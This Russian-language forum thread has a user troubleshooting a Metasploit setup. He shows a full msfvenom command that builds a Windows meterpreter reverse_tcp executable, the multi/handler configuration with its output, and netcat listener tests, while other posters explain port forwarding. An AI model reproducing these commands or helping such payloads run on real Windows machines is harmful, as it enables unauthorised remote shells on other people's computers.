Доброго времени суток. Возникла проблема с Metasploit'oм. Хотя, если задуматься, то виноват вовсе не он. Дело в том, что порт 4444 (как, впрочем, и все остальные) закрыт и занят неким krb524. Простая попытка открыть порт через iptables, разумеется, не дала ничего. Я, начитавшись информации про ошибку в Метасплоите, которая возникала из-за невозможности подключиться к порту 4444 в гугле, стал сетовать на роутер. Добавил на нем правило, пробросив этот порт. Однако ничего не изменилось. Сам процесс krb524 я пытался убить, и... теперь nmap этот процесс всё ещё видит, а pgrep - нет. Думаю попробовать банально удалить эту утиллиту, но мне интересно, сталкивался ли кто-либо с подобным? И как исправлял? Ах да, подобная трабла наблюдается у меня минимум на трех устройствах: ПК, ноутбук и телефон (!) с установленным termux.
nmap его не видит, а просто сообщает какая служба обычно использует этот порт, не конкретно на твоей машине,а вообще порт открывает программа, которая собирается с ним работать, iptables лишь разрешает или запрещает обращаться к этому порту он не может быть закрыт и занят одновременно, если закрыт значит никто его не слушает, а если handler метасплоита всё же запущен, значит он слушает порт на другом интерфейсе
нет в твоём случае проблема скорее всего либо в фаерволе роутера или машины с метасплоитом либо сам метасплоит слушает какой-то другой интерфейс
Ну, роутер отпадает: я пробросил порт 4444. Машины разные, сомневаюсь, что на всех одна и та же проблема с файрволом возможна. Значит, дело в самом Метасплоите. Хорошо, спасибо, буду разбираться
Не дало решительным образом ничего. Spoiler Code: root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=109.---.--.--- LPORT=4444 -f exe R > /root/programm.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 333 bytes Final size of exe file: 73802 bytes root@kali:~# ls Desktop Documents Downloads programm.exe Music Pictures Public Templates Videos root@kali:~# pkill -9 ruby root@kali:~# msfconsole ______________________________________________________________________________ | | | 3Kom SuperHack II Logon | |______________________________________________________________________________| | | | | | | | User Name: [ security ] | | | | Password: [ ] | | | | | | | | [ OK ] | |______________________________________________________________________________| | | | https://metasploit.com | |______________________________________________________________________________| =[ metasploit v4.16.15-dev ] + -- --=[ 1699 exploits - 968 auxiliary - 299 post ] + -- --=[ 503 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > use multi/handler/ msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 109.---.--.--- LHOST => 109.---.--.--- msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. [-] Handler failed to bind to 109.252.62.124:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 msf exploit(handler) > exit
ну во первых в exploit/handler не нужно устанавливать в качестве LHOST свой внешний ip в случае если ты за роутером, ибо внешний ip это ip роутера а не машины с kali но это в принципе всё равно, так как он предупреждает тебя о невозможности забиндить порт на этом ip и биндит его на любом доступном ipv4 интрефейсе а во вторых закрой все метасплоиты, сделай на машине с кали nc -lvp 4444 , и попробуй подключиться на этот порт например с другой машины с линуксом:nc <ip_роутера> 4444 если порт проброшен верно и не мешают фаерволы, то в kali увидишь успешный коннект а дальше уже плясать от этого
А какой тогда? Или вы имеете в виду, что надо сидеть не через роутер? Что ж, похоже, порт проброшен неверно. Я запустил прослушку порта у себя на компьютере, и с телефона (через мобильный интернет, естессно) через Termux запустил netcat, который, немного подумав, радостно выдал Connection Timed Out. Ладно, буду изучать в этом направлении подробней. Спасибо!
локальный ip машины на которой запущен метасплоит вижу ты не совсем понимаешь суть проброса портов когда ты запускаешь метасплоит, он ничего не знает о внешнем ip, о нём знает только роутер так как внешний ip присваивается именно роутеру, а всем кто подключен к роутеру по wifi или по проводу присваивается локальный ip метасплоит ждёт подключение на локальном ip, но как достучаться из внешки на этот локальный ip и порт? для этого и существует проброс портов ты пробрасываешь порт с роутера на этот локальный ip, следовательно когда кто-то извне коннектится на ip роутера и порт 4444, то роутер перенаправляет трафик на локальный ip, а там его уже ловит метасплоит
Не, я понял уже) О том, что такое проброска портов, я уже знал) Просто голова последнее время совсем не работает) Спасибо
Теперь возникает ещё одна проблема: несовместимость полученных в msfvenom файлов с Виндой 7. Не запускаются ни под какими предлогами. Возможности проверить на других машинах нет. С чем это может быть связано?